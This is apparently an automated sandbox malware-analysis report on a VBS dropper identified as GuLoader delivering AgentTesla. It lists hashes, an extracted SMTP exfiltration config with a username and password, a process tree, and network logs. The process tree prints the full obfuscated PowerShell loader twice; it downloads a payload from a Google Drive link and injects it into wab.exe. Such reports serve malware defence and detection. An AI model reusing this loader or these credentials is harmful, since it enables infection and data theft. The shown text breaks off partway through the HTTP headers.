Analysis

  • max time kernel
    147s
  • max time network
    136s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    05/03/2024, 09:16 UTC

General

  • Target

    arbejdsommere.vbs

  • Size

    26KB

  • MD5

    f8577629aeb64e251b9cb1e099e714d0

  • SHA1

    5f0a623045c49b2d7ae72bcbd66ada317e4f03e2

  • SHA256

    8d506a06bb82e85988a2b5be1e4ec782667ef2b5252f16a46adcc75e92077ef7

  • SHA512

    52d6f17ce06caeaa1871a510d323598fe13fb67dacc6d01eb538bf0ad329e37fac28e33e27cf29725c08a3f40fb3a6042df5d6372dbcc499f9e00c932b69479c

  • SSDEEP

    768:qaIZCEG9cNFeKAqIqBW2MQK/fFXSiPwKYv:2CJcviqzjOSiPwjv

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:
    smtp
  • Host:
    smtp.crane-eletronics.com
  • Port:
    587
  • Username:
    pen@crane-eletronics.com
  • Password:
    peFyHns8
  • Email To:
    info@spakmetaluae.com

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\arbejdsommere.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1712
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Fjernvarmevrks='Frosh41:\Totemic';Set-Content $Fjernvarmevrks 'Cismontane';$Tandlgeklinikkernes=Test-Path $Fjernvarmevrks;if($Tandlgeklinikkernes){exit};function Asser9 ($Liquidable){For($Folkekommunen=4; $Folkekommunen -lt $Liquidable.Length-1; $Folkekommunen+=5){$Posttyper=$Posttyper+$Liquidable.'Substring'($Folkekommunen, 1)};$Posttyper;}$Indbytningens=Asser9 ' TeahCiv,tAfsktSymppH.ersAf y: Mas/.ttr/MocsdProgrSkali ,ofvAfraeRasu.P.rsgFaglo F.eo E agAntilHa.de Rfc.Bra,cForfoCompmArtv/Jardu .nhcEpig?Disce.oenx erpQui.oColorCapitNa u= TuddvgteoSaakwUnfonBunglLigeo K.baUds,dUd,t& An i Aspd Se =Taft1SelviSlukDTitiQ.ustZ .vedskaaFPreaU DaaX sm ANonpQ,ownToptaiRemoeFociKTur,cO tipBundJDusk8AfstjGldeAGenntFo,sZ AnozP da5SpisebagkA,jerDTu ehtrim9Divel TrsSMishsProv ';$Posttyper01=Asser9 ' BariHa,hes,nsxForm ';$Afsveden = Asser9 ' tu\ ndesPhysygen.sArchw,tyroFarvw.lee6Brod4Lsty\DedeWGr,si .epn SardnonsoSkatwSpassReevPHeteoUtriwUs ueRobirBrusSDod,hGldee Un,lE.nalMang\ F.rvSul.1 Bud. G p0Pott\Broap PsyoPosow.enseNomirEngusCliohFinaeSkudlTrohlDill.Rec,eErgaxBoure.ese ';&($Posttyper01) (Asser9 'B,od$ ,veFSti,r st.osuffsBackh Ar,4Biza1Ran,2Tids=Vag,$NonpefestnPrmivPr,b: IndwNonjiTietnkrond StviFagor han ') ;&($Posttyper01) (Asser9 'Flec$.ndeAGingfprissVag,vBil eSe.udBffeeCyclnFi,e=Ande$AlumF Ti rB,kooStepsTreehFire4 Anv1.pst2Fo.s+Inte$DiasAmarkf Tons.ambvUnfueFl ed.nugeH zlnKoll ') ;&($Posttyper01) (Asser9 ' B l$Quinc Sekoforml.manu ,vimEvolb,heriKlovdEpim Sup=Afsl b s( Une(.esagUnwowBehomnondiJu.i ,quew KomiBridnBryl3Pai 2Funi_Grogp Ku r Frposparcsk,be,uppsOpk.sHund Lyds- ,idFBebu ProPInt.r,anto Benc IdeeKarasP,otsKrimIl byd Blo=Klge$Sult{ k aPUncoIUndiDsags} Ant)A.ve. BasCBlaao ricmTeknmUdspaWastnCo.sd LocLmuseiMet n CogePi.e) ,en Husa-Todds I.gpK,ltlF.coiFlo.tSpro Unha[Dommc,oleh.imiaScorrBro,] Eu 3,eks4Salv ');&($Posttyper01) (Asser9 'lymp$SploK ,ame kitrbeg,cGhazh .rsiKvareP,eufsitusB sm Sain=Subn Sk.l$Spe,c ykoForkl Banu EksmEnlibPeariLarydKoal[M,nt$Tin,cHjrsoOut.lArchuGriemDemob Sa.iL.sadSta..KallcO,tqo AuduOverndolmtUmen-Levn2 Sy ]Huk ');&($Posttyper01) (Asser9 'Be.g$TannEBrasmNit.uSynclA.naaMyecnAntitele.=Ting( k jTTchae ids Stat Udv-SuccPMurea Aktt,iljhKart Tres$ShelABestfNuncsS.elvAf,le DepdFirkeS,aan ec)Yalb Ukri- S lAMasknEndod Di Dagi(Zymo[Ung.I.ysbnAn.ht.yltPHadet OverL,se]Fri : Irl:Pokes Titi OrtzHyd.eTelp ,ust-.ptaeAdveqIcht Affe8Pied) ov. ') ;if ($Emulant) {&$Afsveden $Kerchiefs;} else {;$Posttyper00=Asser9 'TireS.emptMejsaP,rcrL,vetEst -EkshB Expi,ibotUdenswichTU,ikr R faAguinRetrs Ef f eske Fllrskns Suc,- TofSAppeoAutouDysfr SubcAutoeHemi Jonb$WrinISiden P cd nmbTorvyaltetOrchnElsdi Ti,novergScineAposnEn.os ved Uni,- TelD,nbeeindusWilitGldsiKi.knP,euaJulltdistiGrano.tvnn rue Ser,$ ForFSpelrUdm.oHerosSommhT.il4Anda1Hill2B.dg ';&($Posttyper01) (Asser9 'Bana$ BlaFPollrTtnioFlelsSmerhChec4Tote1 Ar.2,ndr=delp$Placekompn,nnev.api: Fo aA,erp.rrep CondDe,paGnubtArbeaPriv ') ;&($Posttyper01) (Asser9 ',ocuI UndmAul pZenio T,wrPalctU,wo-ImplMMulloFiskdDediu DenlC ireLock F reBFa.tiPizatH,sts RumTFrakr Oola ,omnSphesBirafMockeOpslrBurm ') ;$Frosh412=$Frosh412+'\Angrebskrigs.Var';while (-not $Lepidopteron) {&($Posttyper01) (Asser9 'Sapo$DiscLT.nse MespDiktiU.opdStaroIs.lpEgoctRe.ueAfrurbr,doSigtn Ope=s.mp( Cr,TAnstekills RentP,eu-In,xPregiaUni tFladhKnok Lege$fr tF,ishrPerio ridsR fuhUnce4Hera1 .el2Lerv)Pamp ') ;&($Posttyper01) $Posttyper00;&($Posttyper01) (Asser9 ' F rS hretVagea,temrSu.ctPedo-ankeS andlQuebe viveReetpS.rm Lang5Baha ');}&($Posttyper01) (Asser9 ' Afg$PaddATy.ksA masInteeReberOta Nonf=Phon botGdelie .ontLign-Xi,hCUnmuoViden.maatRodee ampnFuldtDy,l Papi$DuckFSeptrSuovoMarbs SkjhA,mi4Just1Tele2 Cas ');&($Posttyper01) (Asser9 'Ild.$DefeSafd.lOsteyWorkn HavgSibyeS lel orlsRadit Foru.rfte,avarMargsTric Dish= ern Cu p[Gra.SFuksy .aksvol tTrane ,semRaml.andaCAs roslu nstilvGreeepremrAgantBusc]Rumf:Ard,:HaanFLe,trSekso Pk m RadBbrugaLagds ndeeUnde6St a4RustSBihet onr Ko iMe,hnB.skgFile(Guis$ abeAWo,ksAndes GaseGabarPres)Jog. ');&($Posttyper01) (Asser9 ' rio$EjerP erroPornsA,letGrastpyroy TrapBorte panrP.la2 eol Aeth=Adju Af,l[ SanSMd.dySelus Hvat Rese ti.mfo s.Des,T SpleIsocx OrdtTref. GarEGrunnForec,ntro lecdMulti Ul,nB,ksgBesp],eca: .ve:RollAPrivSPsykCMiliI OveIPr,i.Y rkG AsceStent TolSSlett.injr f riBuganMaalgIndd(Yd,r$PrinSOtthlPro,yUnconLrergSydaeH tclPalasUddatKej uOssieMultr,atusRaml) oop ');&($Posttyper01) (Asser9 ' Ind$ A.lO EthvBizae SalrekspsSyndiEllegKunstGipssPensvSer iDuven Fl.d Forumed eEnce=obje$TripP Pi o GlosUlvet Folt CucySelvpUndeeforrr Far2parr. ElesSimuuFibrbAceps Fret Skor ,eciJupanPro gDoku( ins3Bron4P.yc7 Swa0S ud0Pudr6 ,me,Opkb3Geme6Gra 8Brad6 As.6Tede).rue ');&($Posttyper01) $Oversigtsvindue;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1336
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Fjernvarmevrks='Frosh41:\Totemic';Set-Content $Fjernvarmevrks 'Cismontane';$Tandlgeklinikkernes=Test-Path $Fjernvarmevrks;if($Tandlgeklinikkernes){exit};function Asser9 ($Liquidable){For($Folkekommunen=4; $Folkekommunen -lt $Liquidable.Length-1; $Folkekommunen+=5){$Posttyper=$Posttyper+$Liquidable.'Substring'($Folkekommunen, 1)};$Posttyper;}$Indbytningens=Asser9 ' TeahCiv,tAfsktSymppH.ersAf y: Mas/.ttr/MocsdProgrSkali ,ofvAfraeRasu.P.rsgFaglo F.eo E agAntilHa.de Rfc.Bra,cForfoCompmArtv/Jardu .nhcEpig?Disce.oenx erpQui.oColorCapitNa u= TuddvgteoSaakwUnfonBunglLigeo K.baUds,dUd,t& An i Aspd Se =Taft1SelviSlukDTitiQ.ustZ .vedskaaFPreaU DaaX sm ANonpQ,ownToptaiRemoeFociKTur,cO tipBundJDusk8AfstjGldeAGenntFo,sZ AnozP da5SpisebagkA,jerDTu ehtrim9Divel TrsSMishsProv ';$Posttyper01=Asser9 ' BariHa,hes,nsxForm ';$Afsveden = Asser9 ' tu\ ndesPhysygen.sArchw,tyroFarvw.lee6Brod4Lsty\DedeWGr,si .epn SardnonsoSkatwSpassReevPHeteoUtriwUs ueRobirBrusSDod,hGldee Un,lE.nalMang\ F.rvSul.1 Bud. G p0Pott\Broap PsyoPosow.enseNomirEngusCliohFinaeSkudlTrohlDill.Rec,eErgaxBoure.ese ';&($Posttyper01) (Asser9 'B,od$ ,veFSti,r st.osuffsBackh Ar,4Biza1Ran,2Tids=Vag,$NonpefestnPrmivPr,b: IndwNonjiTietnkrond StviFagor han ') ;&($Posttyper01) (Asser9 'Flec$.ndeAGingfprissVag,vBil eSe.udBffeeCyclnFi,e=Ande$AlumF Ti rB,kooStepsTreehFire4 Anv1.pst2Fo.s+Inte$DiasAmarkf Tons.ambvUnfueFl ed.nugeH zlnKoll ') ;&($Posttyper01) (Asser9 ' B l$Quinc Sekoforml.manu ,vimEvolb,heriKlovdEpim Sup=Afsl b s( Une(.esagUnwowBehomnondiJu.i ,quew KomiBridnBryl3Pai 2Funi_Grogp Ku r Frposparcsk,be,uppsOpk.sHund Lyds- ,idFBebu ProPInt.r,anto Benc IdeeKarasP,otsKrimIl byd Blo=Klge$Sult{ k aPUncoIUndiDsags} Ant)A.ve. BasCBlaao ricmTeknmUdspaWastnCo.sd LocLmuseiMet n CogePi.e) ,en Husa-Todds I.gpK,ltlF.coiFlo.tSpro Unha[Dommc,oleh.imiaScorrBro,] Eu 3,eks4Salv ');&($Posttyper01) (Asser9 'lymp$SploK ,ame kitrbeg,cGhazh .rsiKvareP,eufsitusB sm Sain=Subn Sk.l$Spe,c ykoForkl Banu EksmEnlibPeariLarydKoal[M,nt$Tin,cHjrsoOut.lArchuGriemDemob Sa.iL.sadSta..KallcO,tqo AuduOverndolmtUmen-Levn2 Sy ]Huk ');&($Posttyper01) (Asser9 'Be.g$TannEBrasmNit.uSynclA.naaMyecnAntitele.=Ting( k jTTchae ids Stat Udv-SuccPMurea Aktt,iljhKart Tres$ShelABestfNuncsS.elvAf,le DepdFirkeS,aan ec)Yalb Ukri- S lAMasknEndod Di Dagi(Zymo[Ung.I.ysbnAn.ht.yltPHadet OverL,se]Fri : Irl:Pokes Titi OrtzHyd.eTelp ,ust-.ptaeAdveqIcht Affe8Pied) ov. ') ;if ($Emulant) {&$Afsveden $Kerchiefs;} else {;$Posttyper00=Asser9 'TireS.emptMejsaP,rcrL,vetEst -EkshB Expi,ibotUdenswichTU,ikr R faAguinRetrs Ef f eske Fllrskns Suc,- TofSAppeoAutouDysfr SubcAutoeHemi Jonb$WrinISiden P cd nmbTorvyaltetOrchnElsdi Ti,novergScineAposnEn.os ved Uni,- TelD,nbeeindusWilitGldsiKi.knP,euaJulltdistiGrano.tvnn rue Ser,$ ForFSpelrUdm.oHerosSommhT.il4Anda1Hill2B.dg ';&($Posttyper01) (Asser9 'Bana$ BlaFPollrTtnioFlelsSmerhChec4Tote1 Ar.2,ndr=delp$Placekompn,nnev.api: Fo aA,erp.rrep CondDe,paGnubtArbeaPriv ') ;&($Posttyper01) (Asser9 ',ocuI UndmAul pZenio T,wrPalctU,wo-ImplMMulloFiskdDediu DenlC ireLock F reBFa.tiPizatH,sts RumTFrakr Oola ,omnSphesBirafMockeOpslrBurm ') ;$Frosh412=$Frosh412+'\Angrebskrigs.Var';while (-not $Lepidopteron) {&($Posttyper01) (Asser9 'Sapo$DiscLT.nse MespDiktiU.opdStaroIs.lpEgoctRe.ueAfrurbr,doSigtn Ope=s.mp( Cr,TAnstekills RentP,eu-In,xPregiaUni tFladhKnok Lege$fr tF,ishrPerio ridsR fuhUnce4Hera1 .el2Lerv)Pamp ') ;&($Posttyper01) $Posttyper00;&($Posttyper01) (Asser9 ' F rS hretVagea,temrSu.ctPedo-ankeS andlQuebe viveReetpS.rm Lang5Baha ');}&($Posttyper01) (Asser9 ' Afg$PaddATy.ksA masInteeReberOta Nonf=Phon botGdelie .ontLign-Xi,hCUnmuoViden.maatRodee ampnFuldtDy,l Papi$DuckFSeptrSuovoMarbs SkjhA,mi4Just1Tele2 Cas ');&($Posttyper01) (Asser9 'Ild.$DefeSafd.lOsteyWorkn HavgSibyeS lel orlsRadit Foru.rfte,avarMargsTric Dish= ern Cu p[Gra.SFuksy .aksvol tTrane ,semRaml.andaCAs roslu nstilvGreeepremrAgantBusc]Rumf:Ard,:HaanFLe,trSekso Pk m RadBbrugaLagds ndeeUnde6St a4RustSBihet onr Ko iMe,hnB.skgFile(Guis$ abeAWo,ksAndes GaseGabarPres)Jog. ');&($Posttyper01) (Asser9 ' rio$EjerP erroPornsA,letGrastpyroy TrapBorte panrP.la2 eol Aeth=Adju Af,l[ SanSMd.dySelus Hvat Rese ti.mfo s.Des,T SpleIsocx OrdtTref. GarEGrunnForec,ntro lecdMulti Ul,nB,ksgBesp],eca: .ve:RollAPrivSPsykCMiliI OveIPr,i.Y rkG AsceStent TolSSlett.injr f riBuganMaalgIndd(Yd,r$PrinSOtthlPro,yUnconLrergSydaeH tclPalasUddatKej uOssieMultr,atusRaml) oop ');&($Posttyper01) (Asser9 ' Ind$ A.lO EthvBizae SalrekspsSyndiEllegKunstGipssPensvSer iDuven Fl.d Forumed eEnce=obje$TripP Pi o GlosUlvet Folt CucySelvpUndeeforrr Far2parr. ElesSimuuFibrbAceps Fret Skor ,eciJupanPro gDoku( ins3Bron4P.yc7 Swa0S ud0Pudr6 ,me,Opkb3Geme6Gra 8Brad6 As.6Tede).rue ');&($Posttyper01) $Oversigtsvindue;}"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:524
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe"
          4⤵
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:1116

Network

  • flag-us
    DNS
    repository.certum.pl
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    repository.certum.pl
    IN A
    Response
    repository.certum.pl
    IN CNAME
    repository.akamai.certum.pl
    repository.akamai.certum.pl
    IN CNAME
    repository.certum.pl.edgekey.net
    repository.certum.pl.edgekey.net
    IN CNAME
    e99038.dscb.akamaiedge.net
    e99038.dscb.akamaiedge.net
    IN A
    23.48.165.139
    e99038.dscb.akamaiedge.net
    IN A
    23.48.165.155
  • flag-us
    DNS
    repository.certum.pl
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    repository.certum.pl
    IN A
  • flag-gb
    GET
    http://repository.certum.pl/ctnca.cer
    WScript.exe
    Remote address:
    23.48.165.139:80
    Request
    GET /ctnca.cer HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: repository.certum.pl
    Response
    HTTP/1.1 200 OK
    Content-Type: application/pkix-cert
    Content-Length: 959
    Strict-Transport-Security: max-age=63072000; includeSubDomains
    Last-Modified: Fri, 06 Mar 2020 09:56:01 GMT
    Accept-Ranges: bytes
    Cache-Control: public, max-age=900
    Date: Tue, 05 Mar 2024 09:16:21 GMT
    Connection: keep-alive
  • flag-us
    DNS
    drive.google.com
    wab.exe
    Remote address:
    8.8.8.8:53
    Request
    drive.google.com
    IN A
    Response
    drive.google.com
    IN A
    172.217.169.78
  • flag-gb
    HEAD
    https://drive.google.com/uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs
    Remote address:
    172.217.169.78:443
    Request
    HEAD /uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Encoding: identity
    User-Agent: Microsoft BITS/7.5
    Host: drive.google.com
    Response
    HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Tue, 05 Mar 2024 09:16:31 GMT
    Location: https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download
    Content-Length: 0
    Strict-Transport-Security: max-age=31536000
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Security-Policy: script-src 'report-sample' 'nonce-2GDSDtCErwFUZ8n5DCd3Kw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Server: ESF
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-gb
    GET
    https://drive.google.com/uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs
    Remote address:
    172.217.169.78:443
    Request
    GET /uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Encoding: identity
    If-Unmodified-Since: Mon, 04 Mar 2024 22:35:23 GMT
    User-Agent: Microsoft BITS/7.5
    Host: drive.google.com
    Response
    HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Tue, 05 Mar 2024 09:16:33 GMT
    Location: https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download
    Strict-Transport-Security: max-age=31536000
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Security-Policy: script-src 'report-sample' 'nonce-sMrbsvWa2OEKdixeJ3Cp-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-gb
    HEAD
    https://drive.google.com/uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs
    Remote address:
    172.217.169.78:443
    Request
    HEAD /uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Encoding: identity
    User-Agent: Microsoft BITS/7.5
    Host: drive.google.com
    Response
    HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Tue, 05 Mar 2024 09:16:41 GMT
    Location: https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download
    Content-Length: 0
    Strict-Transport-Security: max-age=31536000
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Security-Policy: script-src 'report-sample' 'nonce--FBbVSCTIeJ-G7Zc3zsmPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Server: ESF
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-gb
    GET
    https://drive.google.com/uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs
    Remote address:
    172.217.169.78:443
    Request
    GET /uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Encoding: identity
    If-Unmodified-Since: Mon, 04 Mar 2024 22:35:23 GMT
    User-Agent: Microsoft BITS/7.5
    Host: drive.google.com
    Response
    HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Tue, 05 Mar 2024 09:16:42 GMT
    Location: https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download
    Strict-Transport-Security: max-age=31536000
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Security-Policy: script-src 'report-sample' 'nonce-302DIGJXnvWDHrh8bSK8QA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Cross-Origin-Opener-Policy: same-origin
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-us
    DNS
    drive.usercontent.google.com
    wab.exe
    Remote address:
    8.8.8.8:53
    Request
    drive.usercontent.google.com
    IN A
    Response
    drive.usercontent.google.com
    IN A
    142.250.179.225
  • flag-us
    DNS
    drive.usercontent.google.com
    wab.exe
    Remote address:
    8.8.8.8:53
    Request
    drive.usercontent.google.com
    IN A
  • flag-gb
    HEAD
    https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download
    Remote address:
    142.250.179.225:443
    Request
    HEAD /download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Encoding: identity
    User-Agent: Microsoft BITS/7.5
    Host: drive.usercontent.google.com
    Response
    HTTP/1.1 200 OK
    X-GUploader-UploadID: ABPtcPrD8yv_nEeWXi8O68P4RP8WLQwTY_oojBvKrkT-Xe-BzzIpjOuoKwwiDKxwJoDf66RxLnU
    Content-Type: application/octet-stream
    Content-Security-Policy: sandbox
    Content-Security-Policy: default-src 'none'
    Content-Security-Policy: frame-ancestors 'none'
    X-Content-Security-Policy: sandbox
    Cross-Origin-Opener-Policy: same-origin
    Cross-Origin-Embedder-Policy: require-corp
    Cross-Origin-Resource-Policy: same-site
    X-Content-Type-Options: nosniff
    Content-Disposition: attachment; filename="Manegeklovners.u32"
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Credentials: false
    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, 